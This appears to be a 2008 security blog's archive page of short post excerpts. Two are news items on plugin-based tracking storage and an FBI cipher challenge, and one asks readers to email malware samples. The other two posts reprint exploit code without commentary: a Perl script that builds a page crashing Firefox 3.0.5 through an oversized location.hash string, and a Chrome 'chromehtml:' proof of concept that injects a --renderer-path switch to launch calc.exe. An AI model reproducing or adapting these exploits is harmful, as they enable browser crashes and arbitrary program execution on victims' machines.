Wednesday, December 31st, 2008
By now, most of us are aware of the potential privacy risks posed by Web cookies. But according to a new paper published by security consultancy iSec Partners, traditional browser-based cookies aren't the only technology used to store user data anymore. A number of browser plug-ins offer similar capabilities -- ...
Posted in Coding, Internet, Privacy, Security | No Comments
Monday, December 29th, 2008
The FBI today challenged anyone in the online community to break a cipher code on its site. The code was created by FBI cryptanalysts. The bureau invited hackers to a similar code-cracking challenge last year and got tens of thousands of responses it said.
A number of sites host such cipher ...
Posted in Coding, Internet, Security | No Comments
Sunday, December 28th, 2008
I am looking to do some analysis on various pieces of malware. Please forward me some of your junk and any questionable attachments that you may get in your Inbox. This will be private analysis so please do not expect to hear anything back about what you send.
Please send to:
[email protected]
Thanks,
Troy
Posted in Coding, General BS, Internet, Security | No Comments
Tuesday, December 23rd, 2008
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [
[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n\n";
}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Tuesday, December 23rd, 2008
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
